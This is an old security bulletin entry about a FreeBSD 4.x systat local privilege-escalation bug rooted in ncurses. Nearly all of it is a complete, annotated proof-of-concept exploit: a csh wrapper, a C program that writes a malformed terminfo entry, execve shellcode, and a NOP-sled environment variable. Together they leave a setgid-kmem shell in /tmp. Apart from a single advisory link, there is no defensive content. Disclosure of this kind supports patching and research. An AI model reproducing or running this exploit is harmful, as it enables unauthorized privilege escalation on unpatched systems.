10th Oct 2000 [SBWID-214]
COMMAND
	    systat
SYSTEMS AFFECTED
	    FreeBSD 4.x
PROBLEM
	    Przemyslaw Frasunek posted the following proof-of-concept script:
	
	    #!/bin/csh
	    # (c) 2000 Przemysław Frasunek <[email protected]>
	    #
	    # FreeBSD 4.x systat gid=kmem exploit
	    # Idea by: Jouko Pynnönen <[email protected]>
	    #
	    # Dedicated to ksm.
	    #
	    # Stage 1: the payload script.  The shellcode used further down embeds
	    # the path /tmp/xx, so whatever ends up running it with gid=kmem runs
	    # this script: it copies /bin/csh into /tmp, hands the copy to group
	    # kmem and sets mode 2755 (setgid bit on), leaving a kmem-group shell
	    # behind for the attacker.  The heredoc body IS the payload; keep it
	    # byte-for-byte as written.
	    cat << __EOF__ > /tmp/xx
	    #!/bin/csh
	    cp /bin/csh /tmp
	    chgrp kmem /tmp/csh
	    chmod 2755 /tmp/csh
	    __EOF__
	    chmod 755 /tmp/xx
	    # Stage 2: source of the generator that emits the malformed terminfo
	    # entry (compiled and run below).  This is an unquoted csh heredoc, so
	    # the C text must not contain anything csh would substitute.
	    cat << __EOF__ > /tmp/sploitte.c
	    #include <stdio.h>
	    #include <string.h>
	    #include <fcntl.h>
	    /* OFF:   added to the generator's own stack pointer to form the return
	              address that closes the terminfo string table (see main).
	       ALIGN: number of filler bytes written before that address; together
	              with the 5-byte address field it gives the 521-byte string
	              table size announced in the terminfo header.
	       Both are tuned for the target's stack layout. */
	    #define OFF -400
	    #define ALIGN 516
	    /* Return the current stack pointer.
	       There is no return statement on purpose: the asm copies %esp into
	       %eax and the code relies on the i386 convention of returning
	       integers in %eax, so main() receives that value.  i386-only by
	       design (FreeBSD 4.x target); it is undefined C on anything else. */
	    long getesp(void)
	    {
		    __asm__("movl %esp, %eax\n");
	    }
	    /* Emit a malicious compiled terminfo entry on fd 2.
	       No arguments; writes to stderr only, which the wrapper script
	       redirects into ~/.terminfo/s/screen.  Uses write() without including
	       unistd.h (implicit declaration, accepted by the compiler of the day). */
	    int main(void)
	    {
		    /* Shellcode that runs /tmp/xx (the path is embedded in the bytes;
		       the 0x3b loaded into %al looks like FreeBSD's execve number).
		       It is NOT referenced anywhere in this function: the wrapper
		       script exports the identical bytes in the EGG environment
		       variable, behind a NOP sled, and that is where the overwritten
		       return address is meant to land. */
		    char execshell[] =
		    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
		    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
		    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01"
		    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
		    /* precompiled terminfo binary header: a 2-byte magic, five
		       little-endian 16-bit sizes (0x002a, 0x0026, 0x0021, 0x0182,
		       0x0209) and the 41-byte terminal name
		       "screen|VT 100/ANSI X3.64 virtual terminal".
		       Read as the standard compiled-terminfo layout (names, booleans,
		       numbers, string offsets, string table) the sizes match what is
		       written below: 41 + NUL = 0x2a name bytes, 0x26 = 38 booleans,
		       0x21 = 33 numbers, 0x182 = 386 string offsets and a 0x209 = 521
		       byte string table (ALIGN + 5). */
		    char evilcap[] =
		    "\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
		    "\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
		    "\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
		    "\x6d\x69\x6e\x61\x6c";
		    char retbuf[5];
		    /* Return address to plant: this process's stack pointer plus OFF.
		       Assumes the victim (systat, a different program) has a close
		       enough stack layout and that the EGG sled covers the slack; the
		       wrapper script notes the offset rarely needs adjusting. */
		    long ret = getesp() + OFF;
		    int i;
		    /* malicious terminfo binary, written in the order below */
		    write(2, evilcap, sizeof(evilcap)-1);		/* header + name, without the literal's trailing NUL */
		    for (i=0;i<39;i++) write(2, "\0", 1);		/* name terminator + 38 boolean bytes */
		    for (i=0;i<86;i++) write(2, "\xff", 1);		/* 33 numbers (66 bytes of -1) + 10 string offsets of -1 (absent) */
		    write(2, "\0\0", 2);				/* 11th string offset = 0: the one present string, at the start of the string table */
		    for (i=0;i<750;i++) write(2, "\xff", 1);	/* the remaining 375 string offsets, all absent */
		    for (i=0;i<ALIGN;i++) write(2, "a", 1);		/* string table: 516 filler bytes forming one over-long capability string... */
		    /* ...terminated by the return address, little-endian.  The 4-byte
		       value is split with %c; the shift of a negative int is
		       implementation-defined but only the low byte of each result is
		       used.  sprintf appends a NUL, and all 5 bytes are written so the
		       table is the 521 bytes the header promises.
		       NOTE(review): in the usual capability order entry 10 is
		       cursor_address (cup), which is what a full-screen program such as
		       systat would format on start-up; presumably that is the ncurses
		       path being overflowed (see the referenced advisory) - unverified here. */
		    sprintf(retbuf, "%c%c%c%c", ((int)ret & 0xff),
			    (((int)ret & 0xff00) >> 8),
			    (((int)ret & 0xff0000) >> 16),
			    (((int)ret & 0xff000000) >> 24));
		    write(2, retbuf, 5);
	    }
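	    __EOF__
	    # Build the generator for the malformed terminfo binary.
	    cc -o /tmp/s /tmp/sploitte.c
	    # Plant the entry as ~/.terminfo/s/screen, the per-user location a
	    # terminfo lookup for TERM=screen is expected to consult.  The
	    # generator writes on fd 2, so csh's ">&" (stdout and stderr) is what
	    # captures it.
	    cd $HOME
	    mkdir -p .terminfo/s
	    /tmp/s >& .terminfo/s/screen
	    setenv TERM screen
	    # plenty of nops - usually adjusting offset isn't needed.
	    # EGG = 10000-byte NOP sled followed by the /tmp/xx shellcode (the same
	    # bytes as execshell[] in sploitte.c).  Keep this on ONE line: some
	    # copies of this advisory wrap it after "\x02\x02\x02\", which makes
	    # csh swallow the backslash-newline and silently corrupts the bytes.
	    setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`
	    # boom.  Run the target; its screen output is not needed.
	    /usr/bin/systat >& /dev/null
	    # cleaning up.
	    rm -f .terminfo/s/screen
	    # Success check: /tmp/csh should be listed with group kmem and the
	    # setgid bit (mode 2755), i.e. the payload script ran.
	    ls -la /tmp/csh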
	
	    As this bug lies in ncurses rather than in systat itself (systat is
	    only the gid-kmem program that loads the malicious terminfo entry),
	    I suggest examining the ncurses advisory (see URL below).
SOLUTION
	    http://oliver.efri.hr/~crv/security/bugs/ncurses3.html
	
